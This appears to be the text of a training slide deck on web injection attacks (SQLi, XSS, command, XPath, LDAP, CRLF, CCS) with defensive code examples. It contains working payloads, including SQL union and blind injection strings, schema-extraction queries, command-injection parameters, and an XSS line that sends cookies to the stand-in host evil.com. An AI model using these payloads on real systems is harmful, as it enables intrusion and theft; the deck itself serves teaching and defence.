1 of 18

Injection attacks

Srinivasu Amjuri

2 of 18

Injection Attack

3 of 18

OWASP top 10

4 of 18

Injection Types

  • SQL injection (SQLi) 
  • Cross-site Scripting (XSS) 
  • Code injection
  • OS Command Injection
  • XPath injection
  • LDAP Injection
  • CRLF Injection
  • CCS Injection

5 of 18

SQL Injection

SQL injection in different parts of the query

    • In SELECT statements, within the table or column name.

    • In SELECT statements, within the ORDER BY clause.

    • In UPDATE statements, within the updated values or the WHERE clause.

    • In INSERT statements, within the inserted values.

[Figure: Normal Application Behavior vs. SQL Injection]

6 of 18

Types of SQL Injections

  • Union-based
    • GET http://testphp.vulnweb.com/artists.php?artist=-1 UNION SELECT 1, 2, 3 HTTP/1.1
  • Error-based
    • https://example.com/index.php?Widget=123
  • Blind SQL injection
    • Boolean-based SQL injection
      • xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm
    • Time-based SQL injection
      • '; IF (1=2) WAITFOR DELAY '0:0:10'--
      • '; IF (1=1) WAITFOR DELAY '0:0:10'--

7 of 18

XSS injection

  • Client-side code injection using JavaScript, VBScript, ActiveX, Flash, CSS

<script>alert(document.domain)</script>

<img src=1 onerror=alert(1)>

  • Cross-site Scripting attack vectors:
      • <script>, <body>, <img>, <iframe>, <input>, <div>, <link>, <table>
      • JavaScript events

Exploits:

      • To steal cookies
      • To capture passwords

XSS Context:

  • XSS in HTML tag attributes

<tag attribute="asdfghjkl" name="example" value="1">

"><script>alert(document.domain)</script>

  • XSS into JavaScript
    • Terminating the existing script

</script><img src=1 onerror=alert(document.domain)>

    • HTML-encoding

<a href="#" onclick="... var input='&apos;-alert(document.domain)-&apos;'; ...">

    • JavaScript template literals

document.getElementById('message').innerText = `Welcome,${user.displayName}.`;

8 of 18

Types of XSS attacks

Reflected XSS: where the malicious script comes from the current HTTP request.

    • https://insecure-website.com/search?term=<script>/*+Bad+stuff+here...+*/</script>

Stored XSS: where the malicious script comes from the website's database.

<html>
<h1>Most recent comment</h1>
<script>doSomethingEvil();</script>
</html>

DOM-based XSS: where the vulnerability exists in client-side code rather than server-side code.

<script>
window.location="http://evil.com/?cookie="+document.cookie
</script>

9 of 18

Code Injection

This attack introduces malicious code into the application, which can compromise database integrity, privacy, security and even data correctness.

  • Exploits:
    • steal data
    • bypass access and authentication control
    • full system compromise

10 of 18

Command Injection

  • The payload injected by the attacker is executed as operating system commands.
  • They are not language-specific.

http://example.com/ping.php?address=8.8.8.8%26dir

  • address=8.8.8.8%3Bwhoami (; character, Linux only)
  • address=8.8.8.8%26whoami (& character, Windows only)

11 of 18

XPath injection

<?xml version="1.0" encoding="utf-8"?>
<Employees>
  <Employee ID="1">
    <FirstName>Arnold</FirstName>
    <LastName>Baker</LastName>
    <UserName>ABaker</UserName>
    <Password>SoSecret</Password>
    <Type>Admin</Type>
  </Employee>
  <Employee ID="2">
    <FirstName>Peter</FirstName>
    <LastName>Pan</LastName>
    <UserName>PPan</UserName>
    <Password>NotTelling</Password>
    <Type>User</Type>
  </Employee>
</Employees>

Vulnerable query options (characters that can alter the query):

  • Single quote (')
  • Double quote (")
  • Angle brackets (<, >)
  • Comment tag (<!-- , -->)
  • Ampersand (&)
  • CDATA section delimiters (<![CDATA[ ... ]]>)
  • HTML code
  • Tag injection

C#:

String FindUserXPath;
FindUserXPath = "//Employee[UserName/text()='" + Request["Username"] + "' and Password/text()='" + Request["Password"] + "']";

Username: blah' or 1=1 or 'a'='a
Password: blah

FindUserXPath becomes:

//Employee[UserName/text()='blah' or 1=1 or 'a'='a' and Password/text()='blah']

Logically this is equivalent to:

//Employee[(UserName/text()='blah' or 1=1) or ('a'='a' and Password/text()='blah')]

12 of 18

LDAP Injection

Example:

LDAP filter for authentication: (&(Username=user)(Password=pwd))

LDAP injection query: (&(Username=user)(&))(Password=pwd))

  • (&) -> absolute TRUE
  • (|) -> absolute FALSE
  • In OpenLDAP implementations the second filter is ignored and only the first one is executed.
  • In ADAM, a query with two filters isn't allowed, so the injection is useless.

dn: cn=John Doe,dc=example,dc=com
cn: John Doe
givenName: John
sn: Doe
telephoneNumber: +1 888 555 6789
mail: john@example.com
manager: cn=Barbara Doe,dc=example,dc=com
objectClass: inetOrgPerson
objectClass: person

Query: (&(objectClass=person)(|(givenName=John)(mail=john*)))

Apps: OpenLDAP, MS Active Directory
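An added example, not from the slides: escaping assertion values per RFC 4515 before they are placed into the slide's authentication filter, plus a balance check that refuses a request carrying anything other than one top-level filter. The function names are hypothetical; the filter template and the `user)(&)` input are the slide's.

```python
# RFC 4515 section 3: characters that must be hex-escaped in an assertion value.
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape every filter metacharacter so the value can only ever match data."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def auth_filter_vulnerable(user: str, pwd: str) -> str:
    """The slide's authentication filter built by plain concatenation."""
    return f"(&(Username={user})(Password={pwd}))"


def auth_filter_safe(user: str, pwd: str) -> str:
    """Same filter with both values escaped before they are inserted."""
    return (f"(&(Username={escape_filter_value(user)})"
            f"(Password={escape_filter_value(pwd)}))")


def top_level_filters(ldap_filter: str) -> int:
    """Count top-level parenthesised groups; -1 if the parentheses are unbalanced.

    A filter assembled from one template must have exactly one top-level
    group. Rejecting anything else before it reaches the directory removes
    the dependence on how OpenLDAP or ADAM happen to treat a second filter.
    """
    depth = groups = 0
    for ch in ldap_filter:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return -1
            if depth == 0:
                groups += 1
    return groups if depth == 0 else -1
```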

13 of 18

CRLF Injection

  • CR (carriage return) and LF (line feed) are the characters used in HTTP headers to terminate a line.
  • They are used to split text streams, such as HTTP headers, into separate parts.
  • This attack is a server-side injection at the application layer.
  • If a CRLF injection is successful, it can open the door for further exploits such as cross-site scripting (XSS).

Example (log file injection):

Existing log entry:

123.123.123.123 - 08:15 -/index.php?page=home

Request containing an encoded CRLF (%0d%0a):

/index.php?page=home&%0d%0a127.0.0.1 - 08:15 -/index.php?page=home&restrictedaction=edit

Resulting log entries:

123.123.123.123 - 08:15 -/index.php?page=home&

127.0.0.1 - 08:15 -/index.php?page=home&restrictedaction=edit
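Added example (not from the slides): the slide's log-injection request reproduced in Python, next to a sanitizer that keeps one request to one log line and a check for values echoed into response headers. The log format and request path come from the slide; the function names are hypothetical.

```python
from urllib.parse import unquote

# The request shown on the slide, still URL-encoded as it arrives at the server.
INJECTED_PATH = ("/index.php?page=home&%0d%0a127.0.0.1 - 08:15 "
                 "-/index.php?page=home&restrictedaction=edit")


def log_line_vulnerable(client_ip: str, time: str, path: str) -> str:
    """Writes the decoded path verbatim: %0d%0a inside it starts a second record."""
    return f"{client_ip} - {time} -{unquote(path)}"


def sanitize_log_field(value: str) -> str:
    """Make line terminators visible so one request yields exactly one log line.

    CR, LF and the Unicode line/paragraph separators are replaced by their
    escape spelling; nothing else is altered, so the entry stays greppable.
    """
    return (value.replace("\r", "\\r").replace("\n", "\\n")
            .replace("\u2028", "\\u2028").replace("\u2029", "\\u2029"))


def log_line_safe(client_ip: str, time: str, path: str) -> str:
    """Same record format, every untrusted field passed through the sanitizer."""
    return f"{client_ip} - {time} -{sanitize_log_field(unquote(path))}"


def header_value_ok(value: str) -> bool:
    """Reject a response-header value that contains CR, LF or NUL.

    Apply it to anything user-controlled that is echoed into a header such
    as Location: a CRLF that survives there turns into header injection,
    the route to XSS that the slide mentions.
    """
    return not any(ch in value for ch in "\r\n\x00")
```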

14 of 18

CCS injection

  • CCS injection exploits a vulnerability in the ChangeCipherSpec processing of some versions of OpenSSL.
  • Attackers send invalid signals during the handshake between server and client.
  • Impact: identity theft
  • Only exploitable if:
    • the server uses OpenSSL < 1.0.1h
    • the client uses OpenSSL < 1.0.1h, < 1.0.0m or < 0.9.8za

15 of 18

Defenses against Injection attacks

Primary Defenses:

    • Use of Prepared Statements (with Parameterized Queries)
    • Use of Stored Procedures
    • Whitelist Input Validation
    • Escaping All User Supplied Input

Additional Defenses:

    • Enforcing Least Privilege
    • Performing Whitelist Input Validation as a Secondary Defense
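Added example, not from the slides: the first primary defence, prepared statements, and the ORDER BY case from slide 5 shown in Python with sqlite3 against a constructed Users table. Function names, the allow-list and the sample rows are hypothetical.

```python
import sqlite3

# Hypothetical column names the application allows a user to sort by.
ALLOWED_SORT_COLUMNS = {"Username", "Created"}


def make_db() -> sqlite3.Connection:
    """Constructed sample data; passwords are stored in clear only to keep the example short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT, Created TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)",
                     [("Administrator", "correct horse", "2020-01-01"),
                      ("alice", "hunter2", "2021-06-30")])
    return conn


def login_concat(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable: the input becomes SQL text, so a quote in it rewrites the WHERE clause."""
    sql = ("SELECT 1 FROM Users WHERE Username = '" + username
           + "' AND Password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_prepared(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Safe: the SQL text is fixed; the driver passes the ? values as data, never as syntax."""
    sql = "SELECT 1 FROM Users WHERE Username = ? AND Password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def list_users_sorted(conn: sqlite3.Connection, sort_column: str) -> list:
    """ORDER BY names a column, which cannot be bound as a parameter: allow-list it instead."""
    if sort_column not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort_column!r}")
    rows = conn.execute(f"SELECT Username FROM Users ORDER BY {sort_column}").fetchall()
    return [row[0] for row in rows]
```

A password of `' OR '1'='1` logs in through `login_concat` and is rejected by `login_prepared`, because the bound value is compared as a string rather than parsed as SQL.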

16 of 18

SQL Injection Examples

17 of 18

  • Identifying the back-end (DBMS-specific expressions)
    • MySQL: conv('a',16,2)=conv('a',16,2), connection_id()=connection_id(), crc32('MySQL')=crc32('MySQL')
    • MSSQL: BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123), @@CONNECTIONS>0, @@CONNECTIONS=@@CONNECTIONS, @@CPU_BUSY=@@CPU_BUSY, USER_ID(1)=USER_ID(1)
    • Oracle: ROWNUM=ROWNUM, RAWTOHEX('AB')=RAWTOHEX('AB'), LNNVL(0=123)

  • Detecting number of columns
    • ORDER BY / GROUP BY
      • 1' ORDER BY 1--+    # True
      • 1' ORDER BY 2--+    # True
      • 1' ORDER BY 3--+    # True
      • 1' ORDER BY 4--+    # False
    • UNION SELECT
      • 1' UNION SELECT null-- -              Not working
      • 1' UNION SELECT null,null-- -         Not working
      • 1' UNION SELECT null,null,null-- -    Worked

18 of 18

Extract database names, tables and column names

  • Database names:
    -1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata
  • Tables of a database:
    -1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,table_name,0x7C) fRoM information_schema.tables wHeRe table_schema=[database]
  • Column names:
    -1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]